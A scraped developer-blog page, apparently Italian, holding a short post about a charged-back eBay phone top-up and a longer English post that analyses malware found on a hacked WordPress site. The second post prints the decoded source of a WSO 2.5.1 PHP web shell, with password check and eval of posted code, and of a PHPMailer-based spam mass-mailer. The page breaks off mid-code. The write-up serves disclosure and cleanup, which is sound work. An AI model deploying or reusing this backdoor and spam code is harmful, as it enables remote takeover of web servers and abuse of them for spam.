{ Dev Farm }

Web & Windows Development

wind-ebay

18 febbraio 2016
di max
0 commenti

Brutta esperienza ricariche Wind su eBay

5.00 avg. rating (96% score) - 3 votes

Vi racconto la mia esperienza con una ricarica Wind acquistata, a prezzo ridotto, su ebay.

In data 01/12/2015 ho acquistato su ebay una ricarica wind da 50€ di traffico al costo di 33€. La ricarica è arrivata lo stesso giorno senza alcun problema.

Quasi 2 mesi dopo, il 26 gennaio arriva un messaggio dalla wind:

Gentile Cliente a seguito di anomalie di ricarica rilevate, su questa numerazione, provvederemo ad addebitare un importo pari al valore delle ricariche accreditate. Un sms le confermera’ l’attivita’ e l’addebito. Per info 155.

Puntuale qualche minuti dopo mi hanno addebitato la somma. Non avevo 50€ di traffico, allora mi hanno addebitato quello che potevano, lasciandomi 1€ di cortesia

Capture+_2016-01-28-13-32-23           Capture+_2016-01-28-13-31-55

 

Personalmente non acquisterò più ricariche su ebay!

:bye:

backdoor-photographie-urbaine

6 febbraio 2015
di max
4 commenti

WordPress massmailer malware and WSO 2.5.1 shell backdoor

5.00 avg. rating (95% score) - 2 votes

Ok, I found a suspicious file on another website and it’s a shell backdoor.

/wp-content/backup-2365b/.title14.php
/wp-content/uploads/wysija/themes/rss.lib.php
/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php

this is original content:

and

And this is the unencrypted content:

$auth_pass = "f4eeb83f67a86ea7baaaac13bebe6417";

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    header('HTTP/1.0 404 Not Found');
    die("404");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

function actionRC() {
    if(!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "wso_version" => WSO_VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
exit;

Another bad file is:

/wp-content/themes/Avada/framework/plugins/envato-wordpress-toolkit-library/object.php

once unencrypted we found a mass mailer!

if(isset($_SERVER))
{
	$_SERVER['PHP_SELF'] = "/"; 
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
		$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
}

if(isset($_FILES))
{
	foreach($_FILES as $key => $file)
	{
		if(!strpos($file['name'], ".jpg"))
		{
			$filename = alter_macros($file['name']);
			$filename = num_macros($filename);
			$filename = xnum_macros($filename);
			$_FILES[$key]["name"] = $filename;
		}
	}
}
	
function custom_strip_tags($text)
{
    $text = strip_tags($text, '<a>');

    $text = str_replace("</a><a href="\&quot;&quot;,">", "", $text);
    $text = str_replace("\"&gt;", " ] ", $text);

    return $text;
}

function is_ip($str) {
  return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}

function from_host($content)
{

    $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);

    if (is_ip($host))
    {
        return $content;
    }
    
    $tokens = explode("@", $content);

    $content = $tokens[0] . "@" . $host . "&gt;";

    return $content;
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i &lt; count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}


function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i &lt; count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i &lt; count($matches[0]); $i++)     {         $min = $matches[1][$i];         $max = $matches[2][$i];         $rand = rand($min, $max);         $content = str_replace($matches[0][$i], $rand, $content);     }     return $content; } function fteil_macros($content, $fteil) {         return str_replace("[FTEIL]", $fteil, $content); } class PHPMailer {     public $Version = '5.2.9';     public $Priority = 3;     public $CharSet = 'iso-8859-1';     public $ContentType = 'text/plain';     public $Encoding = '8bit';     public $ErrorInfo = '';     public $From = 'root@localhost';     public $FromName = 'Root User';     public $Sender = '';     public $ReturnPath = '';     public $Subject = '';     public $Body = '';     public $AltBody = '';     public $Ical = '';     protected $MIMEBody = '';     protected $MIMEHeader = '';     protected $mailHeader = '';     public $WordWrap = 0;     public $Mailer = 'mail';     public $Sendmail = '/usr/sbin/sendmail';     public $UseSendmailOptions = true;     public $PluginDir = '';     public $ConfirmReadingTo = '';     public $Hostname = '';     public $MessageID = '';     public $MessageDate = '';     public $Host = 'localhost';     public $Port = 25;     public $Helo = '';     public $SMTPSecure = '';     public $SMTPAuth = false;     public $Username = '';     public $Password = '';     public $AuthType = '';     public $Realm = '';     public $Workstation = '';     public $Timeout = 300;     public $SMTPDebug = 0;     public $Debugoutput = 'echo';     public $SMTPKeepAlive = false;     public $SingleTo = false;     public $SingleToArray = array();     public $do_verp = false;     public $AllowEmpty = false;     public $LE = "\n";     public $DKIM_selector = '';     public $DKIM_identity = '';     public $DKIM_passphrase = '';     public $DKIM_domain = '';     public $DKIM_private = '';     public $action_function = '';     public $XMailer = '';     protected $smtp = null;     protected $to = array();     protected $cc = array();     protected $bcc = array();     protected $ReplyTo = array();     protected $all_recipients = array();     protected $attachment = array();     protected $CustomHeader = array();     protected $lastMessageID = '';     protected $message_type = '';     protected $boundary = array();     protected $language = array();     protected $error_count = 0;     protected $sign_cert_file = '';     protected $sign_key_file = '';     protected $sign_key_pass = '';     protected $exceptions = false;     const STOP_MESSAGE = 0;     const STOP_CONTINUE = 1;     const STOP_CRITICAL = 2;     const CRLF = "\r\n";     public function __construct($exceptions = false)     {         $this-&gt;exceptions = (boolean)$exceptions;
    }

    public function __destruct()
    {

    }

    private function mailPassthru($to, $subject, $body, $header, $params)
    {
        //Check overloading of mail function to avoid double-encoding
        if (ini_get('mbstring.func_overload') &amp; 1) {
            $subject = $this-&gt;secureHeader($subject);
        } else {
            $subject = $this-&gt;encodeHeader($this-&gt;secureHeader($subject));
        }
        if (ini_get('safe_mode') || !($this-&gt;UseSendmailOptions)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }
        return $result;
    }

    protected function edebug($str)
    {
        if ($this-&gt;SMTPDebug &lt;= 0) {             return;         }         //Avoid clash with built-in function names         if (!in_array($this-&gt;Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this-&gt;Debugoutput)) {
            call_user_func($this-&gt;Debugoutput, $str, $this-&gt;SMTPDebug);
            return;
        }
        switch ($this-&gt;Debugoutput) {
            case 'error_log':
                //Don't output, just log
                error_log($str);
                break;
            case 'html':
                //Cleans up output a bit for a better looking, HTML-safe output
                echo htmlentities(
                    preg_replace('/[\r\n]+/', '', $str),
                    ENT_QUOTES,
                    'UTF-8'
                )
                . "
\n";
                break;
            case 'echo':
            default:
                //Normalize line breaks
                $str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
                echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
                    "\n",
                    "\n                   \t                  ",
                    trim($str)
                ) . "\n";
        }
    }

    public function isHTML($isHtml = true)
    {
        if ($isHtml) {
            $this-&gt;ContentType = 'text/html';
        } else {
            $this-&gt;ContentType = 'text/plain';
        }
    }

    public function isSMTP()
    {
        $this-&gt;Mailer = 'smtp';
    }

    public function isMail()
    {
        $this-&gt;Mailer = 'mail';
    }

    public function isSendmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'sendmail')) {
            $this-&gt;Sendmail = '/usr/sbin/sendmail';
        } else {
            $this-&gt;Sendmail = $ini_sendmail_path;
        }
        $this-&gt;Mailer = 'sendmail';
    }

    public function isQmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'qmail')) {
            $this-&gt;Sendmail = '/var/qmail/bin/qmail-inject';
        } else {
            $this-&gt;Sendmail = $ini_sendmail_path;
        }
        $this-&gt;Mailer = 'qmail';
    }

    public function addAddress($address, $name = '')
    {
        return $this-&gt;addAnAddress('to', $address, $name);
    }

    public function addCC($address, $name = '')
    {
        return $this-&gt;addAnAddress('cc', $address, $name);
    }

    public function addBCC($address, $name = '')
    {
        return $this-&gt;addAnAddress('bcc', $address, $name);
    }

    public function addReplyTo($address, $name = '')
    {
        return $this-&gt;addAnAddress('Reply-To', $address, $name);
    }

    protected function addAnAddress($kind, $address, $name = '')
    {
        if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) {
            $this-&gt;setError($this-&gt;lang('Invalid recipient array') . ': ' . $kind);
            $this-&gt;edebug($this-&gt;lang('Invalid recipient array') . ': ' . $kind);
            if ($this-&gt;exceptions) {
                throw new phpmailerException('Invalid recipient array: ' . $kind);
            }
            return false;
        }
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        if (!$this-&gt;validateAddress($address)) {
            $this-&gt;setError($this-&gt;lang('invalid_address') . ': ' . $address);
            $this-&gt;edebug($this-&gt;lang('invalid_address') . ': ' . $address);
            if ($this-&gt;exceptions) {
                throw new phpmailerException($this-&gt;lang('invalid_address') . ': ' . $address);
            }
            return false;
        }
        if ($kind != 'Reply-To') {
            if (!isset($this-&gt;all_recipients[strtolower($address)])) {
                array_push($this-&gt;$kind, array($address, $name));
                $this-&gt;all_recipients[strtolower($address)] = true;
                return true;
            }
        } else {
            if (!array_key_exists(strtolower($address), $this-&gt;ReplyTo)) {
                $this-&gt;ReplyTo[strtolower($address)] = array($address, $name);
                return true;
            }
        }
        return false;
    }

    public function setFrom($address, $name = '', $auto = true)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        if (!$this-&gt;validateAddress($address)) {
            $this-&gt;setError($this-&gt;lang('invalid_address') . ': ' . $address);
            $this-&gt;edebug($this-&gt;lang('invalid_address') . ': ' . $address);
            if ($this-&gt;exceptions) {
                throw new phpmailerException($this-&gt;lang('invalid_address') . ': ' . $address);
            }
            return false;
        }
        $this-&gt;From = $address;
        $this-&gt;FromName = $name;
        if ($auto) {
            if (empty($this-&gt;Sender)) {
                $this-&gt;Sender = $address;
            }
        }
        return true;
    }

    public function getLastMessageID()
    {
        return $this-&gt;lastMessageID;
    }

    public static function validateAddress($address, $patternselect = 'auto')
    {
        if (!$patternselect or $patternselect == 'auto') {
            //Check this constant first so it works when extension_loaded() is disabled by safe mode
            //Constant was added in PHP 5.2.4
            if (defined('PCRE_VERSION')) {
                //This pattern can get stuck in a recursive loop in PCRE &lt;= 8.0.2                 if (version_compare(PCRE_VERSION, '8.0.3') &gt;= 0) {
                    $patternselect = 'pcre8';
                } else {
                    $patternselect = 'pcre';
                }
            } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
                //Fall back to older PCRE
                $patternselect = 'pcre';
            } else {
                //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
                if (version_compare(PHP_VERSION, '5.2.0') &gt;= 0) {
                    $patternselect = 'php';
                } else {
                    $patternselect = 'noregex';
                }
            }
        }
        switch ($patternselect) {
            case 'pcre8':

                return (boolean)preg_match(
                    '/^(?!(?&gt;(?1)"?(?&gt;\\\[ -~]|[^"])"?(?1)){255,})(?!(?&gt;(?1)"?(?&gt;\\\[ -~]|[^"])"?(?1)){65,}@)' .
                    '((?&gt;(?&gt;(?&gt;((?&gt;(?&gt;(?&gt;\x0D\x0A)?[\t ])+|(?&gt;[\t ]*\x0D\x0A)?[\t ]+)?)(\((?&gt;(?2)' .
                    '(?&gt;[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
                    '([!#-\'*+\/-9=?^-~-]+|"(?&gt;(?2)(?&gt;[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
                    '(?2)")(?&gt;(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?&gt;([a-z0-9](?&gt;[a-z0-9-]*[a-z0-9])?)' .
                    '(?&gt;(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?&gt;IPv6:(?&gt;([a-f0-9]{1,4})(?&gt;:(?6)){7}' .
                    '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?&gt;:(?6)){0,6})?::(?7)?))|(?&gt;(?&gt;IPv6:(?&gt;(?6)(?&gt;:(?6)){5}:' .
                    '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?&gt;((?6)(?&gt;:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?&gt;\.(?9)){3}))\])(?1)$/isD',
                    $address
                );
            case 'pcre':
                //An older regex that doesn't need a recent PCRE
                return (boolean)preg_match(
                    '/^(?!(?&gt;"?(?&gt;\\\[ -~]|[^"])"?){255,})(?!(?&gt;"?(?&gt;\\\[ -~]|[^"])"?){65,}@)(?&gt;' .
                    '[!#-\'*+\/-9=?^-~-]+|"(?&gt;(?&gt;[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
                    '(?&gt;\.(?&gt;[!#-\'*+\/-9=?^-~-]+|"(?&gt;(?&gt;[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
                    '@(?&gt;(?![a-z0-9-]{64,})(?&gt;[a-z0-9](?&gt;[a-z0-9-]*[a-z0-9])?)(?&gt;\.(?![a-z0-9-]{64,})' .
                    '(?&gt;[a-z0-9](?&gt;[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?&gt;IPv6:(?&gt;(?&gt;[a-f0-9]{1,4})(?&gt;:' .
                    '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?&gt;[a-f0-9]{1,4}(?&gt;:[a-f0-9]{1,4}){0,6})?' .
                    '::(?&gt;[a-f0-9]{1,4}(?&gt;:[a-f0-9]{1,4}){0,6})?))|(?&gt;(?&gt;IPv6:(?&gt;[a-f0-9]{1,4}(?&gt;:' .
                    '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?&gt;[a-f0-9]{1,4}(?&gt;:[a-f0-9]{1,4}){0,4})?' .
                    '::(?&gt;(?:[a-f0-9]{1,4}(?&gt;:[a-f0-9]{1,4}){0,4}):)?))?(?&gt;25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?&gt;\.(?&gt;25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
                    $address
                );
            case 'html5':
                return (boolean)preg_match(
                    '/^[a-zA-Z0-9.!#$%&amp;\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
                    '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
                    $address
                );
            case 'noregex':
                return (strlen($address) &gt;= 3
                    and strpos($address, '@') &gt;= 1
                    and strpos($address, '@') != strlen($address) - 1);
            case 'php':
            default:
                return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
        }
    }

    public function send()
    {
        try {
            if (!$this-&gt;preSend()) {
                return false;
            }
            return $this-&gt;postSend();
        } catch (phpmailerException $exc) {
            $this-&gt;mailHeader = '';
            $this-&gt;setError($exc-&gt;getMessage());
            if ($this-&gt;exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    public function preSend()
    {
        try {
            $this-&gt;mailHeader = '';
            if ((count($this-&gt;to) + count($this-&gt;cc) + count($this-&gt;bcc)) &lt; 1) {                 throw new phpmailerException($this-&gt;lang('provide_address'), self::STOP_CRITICAL);
            }

            // Set whether the message is multipart/alternative
            if (!empty($this-&gt;AltBody)) {
                $this-&gt;ContentType = 'multipart/alternative';
            }

            $this-&gt;error_count = 0; // reset errors
            $this-&gt;setMessageType();
            // Refuse to send an empty message unless we are specifically allowing it
            if (!$this-&gt;AllowEmpty and empty($this-&gt;Body)) {
                throw new phpmailerException($this-&gt;lang('empty_message'), self::STOP_CRITICAL);
            }

            $this-&gt;MIMEHeader = $this-&gt;createHeader();
            $this-&gt;MIMEBody = $this-&gt;createBody();

            if ($this-&gt;Mailer == 'mail') {
                if (count($this-&gt;to) &gt; 0) {
                    $this-&gt;mailHeader .= $this-&gt;addrAppend('To', $this-&gt;to);
                } else {
                    $this-&gt;mailHeader .= $this-&gt;headerLine('To', 'undisclosed-recipients:;');
                }
                $this-&gt;mailHeader .= $this-&gt;headerLine(
                    'Subject',
                    $this-&gt;encodeHeader($this-&gt;secureHeader(trim($this-&gt;Subject)))
                );
            }

            // Sign with DKIM if enabled
            if (!empty($this-&gt;DKIM_domain)
                &amp;&amp; !empty($this-&gt;DKIM_private)
                &amp;&amp; !empty($this-&gt;DKIM_selector)
                &amp;&amp; file_exists($this-&gt;DKIM_private)) {
                $header_dkim = $this-&gt;DKIM_Add(
                    $this-&gt;MIMEHeader . $this-&gt;mailHeader,
                    $this-&gt;encodeHeader($this-&gt;secureHeader($this-&gt;Subject)),
                    $this-&gt;MIMEBody
                );
                $this-&gt;MIMEHeader = rtrim($this-&gt;MIMEHeader, "\r\n ") . self::CRLF .
                    str_replace("\r\n", "\n", $header_dkim) . self::CRLF;
            }
            return true;

        } catch (phpmailerException $exc) {
            $this-&gt;setError($exc-&gt;getMessage());
            if ($this-&gt;exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    public function postSend()
    {
        try {
            // Choose the mailer and send through it
            switch ($this-&gt;Mailer) {
                case 'sendmail':
                case 'qmail':
                    return $this-&gt;sendmailSend($this-&gt;MIMEHeader, $this-&gt;MIMEBody);
                case 'mail':
                    return $this-&gt;mailSend($this-&gt;MIMEHeader, $this-&gt;MIMEBody);
                default:
                    $sendMethod = $this-&gt;Mailer.'Send';
                    if (method_exists($this, $sendMethod)) {
                        return $this-&gt;$sendMethod($this-&gt;MIMEHeader, $this-&gt;MIMEBody);
                    }

                    return $this-&gt;mailSend($this-&gt;MIMEHeader, $this-&gt;MIMEBody);
            }
        } catch (phpmailerException $exc) {
            $this-&gt;setError($exc-&gt;getMessage());
            $this-&gt;edebug($exc-&gt;getMessage());
            if ($this-&gt;exceptions) {
                throw $exc;
            }
        }
        return false;
    }

    protected function sendmailSend($header, $body)
    {
        if ($this-&gt;Sender != '') {
            if ($this-&gt;Mailer == 'qmail') {
                $sendmail = sprintf('%s -f%s', escapeshellcmd($this-&gt;Sendmail), escapeshellarg($this-&gt;Sender));
            } else {
                $sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this-&gt;Sendmail), escapeshellarg($this-&gt;Sender));
            }
        } else {
            if ($this-&gt;Mailer == 'qmail') {
                $sendmail = sprintf('%s', escapeshellcmd($this-&gt;Sendmail));
            } else {
                $sendmail = sprintf('%s -oi -t', escapeshellcmd($this-&gt;Sendmail));
            }
        }
        if ($this-&gt;SingleTo) {
            foreach ($this-&gt;SingleToArray as $toAddr) {
                if (!@$mail = popen($sendmail, 'w')) {
                    throw new phpmailerException($this-&gt;lang('execute') . $this-&gt;Sendmail, self::STOP_CRITICAL);
                }
                fputs($mail, 'To: ' . $toAddr . "\n");
                fputs($mail, $header);
                fputs($mail, $body);
                $result = pclose($mail);
                $this-&gt;doCallback(
                    ($result == 0),
                    array($toAddr),
                    $this-&gt;cc,
                    $this-&gt;bcc,
                    $this-&gt;Subject,
                    $body,
                    $this-&gt;From
                );
                if ($result != 0) {
                    throw new phpmailerException($this-&gt;lang('execute') . $this-&gt;Sendmail, self::STOP_CRITICAL);
                }
            }
        } else {
            if (!@$mail = popen($sendmail, 'w')) {
                throw new phpmailerException($this-&gt;lang('execute') . $this-&gt;Sendmail, self::STOP_CRITICAL);
            }
            fputs($mail, $header);
            fputs($mail, $body);
            $result = pclose($mail);
            $this-&gt;doCallback(($result == 0), $this-&gt;to, $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
            if ($result != 0) {
                throw new phpmailerException($this-&gt;lang('execute') . $this-&gt;Sendmail, self::STOP_CRITICAL);
            }
        }
        return true;
    }

    protected function mailSend($header, $body)
    {
        $toArr = array();
        foreach ($this-&gt;to as $toaddr) {
            $toArr[] = $this-&gt;addrFormat($toaddr);
        }
        $to = implode(', ', $toArr);

        if (empty($this-&gt;Sender)) {
            $params = ' ';
        } else {
            $params = sprintf('-f%s', $this-&gt;Sender);
        }
        if ($this-&gt;Sender != '' and !ini_get('safe_mode')) {
            $old_from = ini_get('sendmail_from');
            ini_set('sendmail_from', $this-&gt;Sender);
        }
        $result = false;
        if ($this-&gt;SingleTo &amp;&amp; count($toArr) &gt; 1) {
            foreach ($toArr as $toAddr) {
                $result = $this-&gt;mailPassthru($toAddr, $this-&gt;Subject, $body, $header, $params);
                $this-&gt;doCallback($result, array($toAddr), $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
            }
        } else {
            $result = $this-&gt;mailPassthru($to, $this-&gt;Subject, $body, $header, $params);
            $this-&gt;doCallback($result, $this-&gt;to, $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
        }
        if (isset($old_from)) {
            ini_set('sendmail_from', $old_from);
        }
        if (!$result) {
            throw new phpmailerException($this-&gt;lang('instantiate'), self::STOP_CRITICAL);
        }
        return true;
    }

    public function setLanguage($langcode = 'en', $lang_path = '')
    {
        // Define full set of translatable strings in English
        $PHPMAILER_LANG = array(
            'authenticate' =&gt; 'SMTP Error: Could not authenticate.',
            'connect_host' =&gt; 'SMTP Error: Could not connect to SMTP host.',
            'data_not_accepted' =&gt; 'SMTP Error: data not accepted.',
            'empty_message' =&gt; 'Message body empty',
            'encoding' =&gt; 'Unknown encoding: ',
            'execute' =&gt; 'Could not execute: ',
            'file_access' =&gt; 'Could not access file: ',
            'file_open' =&gt; 'File Error: Could not open file: ',
            'from_failed' =&gt; 'The following From address failed: ',
            'instantiate' =&gt; 'Could not instantiate mail function.',
            'invalid_address' =&gt; 'Invalid address',
            'mailer_not_supported' =&gt; ' mailer is not supported.',
            'provide_address' =&gt; 'You must provide at least one recipient email address.',
            'recipients_failed' =&gt; 'SMTP Error: The following recipients failed: ',
            'signing' =&gt; 'Signing Error: ',
            'smtp_connect_failed' =&gt; 'SMTP connect() failed.',
            'smtp_error' =&gt; 'SMTP server error: ',
            'variable_set' =&gt; 'Cannot set or reset variable: '
        );
        if (empty($lang_path)) {
            // Calculate an absolute path so it can work if CWD is not here
            $lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;
        }
        $foundlang = true;
        $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';
        if ($langcode != 'en') { // There is no English translation file
            // Make sure language file path is readable
            if (!is_readable($lang_file)) {
                $foundlang = false;
            } else {
                $foundlang = include $lang_file;
            }
        }
        $this-&gt;language = $PHPMAILER_LANG;
        return (boolean)$foundlang; // Returns false if language not found
    }

    public function getTranslations()
    {
        return $this-&gt;language;
    }

    public function addrAppend($type, $addr)
    {
        $addresses = array();
        foreach ($addr as $address) {
            $addresses[] = $this-&gt;addrFormat($address);
        }
        return $type . ': ' . implode(', ', $addresses) . $this-&gt;LE;
    }


    public function addrFormat($addr)
    {
        if (empty($addr[1])) { // No name provided
            return $this-&gt;secureHeader($addr[0]);
        } else {
            return $this-&gt;encodeHeader($this-&gt;secureHeader($addr[1]), 'phrase') . ' &lt;' . $this-&gt;secureHeader(
                $addr[0]
            ) . '&gt;';
        }
    }


    public function wrapText($message, $length, $qp_mode = false)
    {
        $soft_break = ($qp_mode) ? sprintf(' =%s', $this-&gt;LE) : $this-&gt;LE;

        $is_utf8 = (strtolower($this-&gt;CharSet) == 'utf-8');
        $lelen = strlen($this-&gt;LE);
        $crlflen = strlen(self::CRLF);

        $message = $this-&gt;fixEOL($message);
        if (substr($message, -$lelen) == $this-&gt;LE) {
            $message = substr($message, 0, -$lelen);
        }

        $line = explode($this-&gt;LE, $message); // Magic. We know fixEOL uses $LE
        $message = '';
        for ($i = 0; $i &lt; count($line); $i++) {
            $line_part = explode(' ', $line[$i]);
            $buf = '';
            for ($e = 0; $e &lt; count($line_part); $e++) {                 $word = $line_part[$e];                 if ($qp_mode and (strlen($word) &gt; $length)) {
                    $space_left = $length - strlen($buf) - $crlflen;
                    if ($e != 0) {
                        if ($space_left &gt; 20) {
                            $len = $space_left;
                            if ($is_utf8) {
                                $len = $this-&gt;utf8CharBoundary($word, $len);
                            } elseif (substr($word, $len - 1, 1) == '=') {
                                $len--;
                            } elseif (substr($word, $len - 2, 1) == '=') {
                                $len -= 2;
                            }
                            $part = substr($word, 0, $len);
                            $word = substr($word, $len);
                            $buf .= ' ' . $part;
                            $message .= $buf . sprintf('=%s', self::CRLF);
                        } else {
                            $message .= $buf . $soft_break;
                        }
                        $buf = '';
                    }
                    while (strlen($word) &gt; 0) {
                        if ($length &lt;= 0) {                             break;                         }                         $len = $length;                         if ($is_utf8) {                             $len = $this-&gt;utf8CharBoundary($word, $len);
                        } elseif (substr($word, $len - 1, 1) == '=') {
                            $len--;
                        } elseif (substr($word, $len - 2, 1) == '=') {
                            $len -= 2;
                        }
                        $part = substr($word, 0, $len);
                        $word = substr($word, $len);

                        if (strlen($word) &gt; 0) {
                            $message .= $part . sprintf('=%s', self::CRLF);
                        } else {
                            $buf = $part;
                        }
                    }
                } else {
                    $buf_o = $buf;
                    $buf .= ($e == 0) ? $word : (' ' . $word);

                    if (strlen($buf) &gt; $length and $buf_o != '') {
                        $message .= $buf_o . $soft_break;
                        $buf = $word;
                    }
                }
            }
            $message .= $buf . self::CRLF;
        }

        return $message;
    }

    public function utf8CharBoundary($encodedText, $maxLength)
    {
        $foundSplitPos = false;
        $lookBack = 3;
        while (!$foundSplitPos) {
            $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
            $encodedCharPos = strpos($lastChunk, '=');
            if (false !== $encodedCharPos) {
                // Found start of encoded character byte within $lookBack block.
                // Check the encoded byte value (the 2 chars after the '=')
                $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
                $dec = hexdec($hex);
                if ($dec &lt; 128) { // Single byte character.                     // If the encoded char was found at pos 0, it will fit                     // otherwise reduce maxLength to start of the encoded char                     $maxLength = ($encodedCharPos == 0) ? $maxLength :                         $maxLength - ($lookBack - $encodedCharPos);                     $foundSplitPos = true;                 } elseif ($dec &gt;= 192) { // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength = $maxLength - ($lookBack - $encodedCharPos);
                    $foundSplitPos = true;
                } elseif ($dec &lt; 192) { // Middle byte of a multi byte character, look further back                     $lookBack += 3;                 }             } else {                 // No encoded character found                 $foundSplitPos = true;             }         }         return $maxLength;     }     public function setWordWrap()     {         if ($this-&gt;WordWrap &lt; 1) {             return;         }         switch ($this-&gt;message_type) {
            case 'alt':
            case 'alt_inline':
            case 'alt_attach':
            case 'alt_inline_attach':
                $this-&gt;AltBody = $this-&gt;wrapText($this-&gt;AltBody, $this-&gt;WordWrap);
                break;
            default:
                $this-&gt;Body = $this-&gt;wrapText($this-&gt;Body, $this-&gt;WordWrap);
                break;
        }
    }

    public function createHeader()
    {
        $result = '';

        // Set the boundaries
        $uniq_id = md5(uniqid(time()));
        $this-&gt;boundary[1] = 'b1_' . $uniq_id;
        $this-&gt;boundary[2] = 'b2_' . $uniq_id;
        $this-&gt;boundary[3] = 'b3_' . $uniq_id;

        if ($this-&gt;MessageDate == '') {
            $this-&gt;MessageDate = self::rfcDate();
        }
        $result .= $this-&gt;headerLine('Date', $this-&gt;MessageDate);


        // To be created automatically by mail()
        if ($this-&gt;SingleTo) {
            if ($this-&gt;Mailer != 'mail') {
                foreach ($this-&gt;to as $toaddr) {
                    $this-&gt;SingleToArray[] = $this-&gt;addrFormat($toaddr);
                }
            }
        } else {
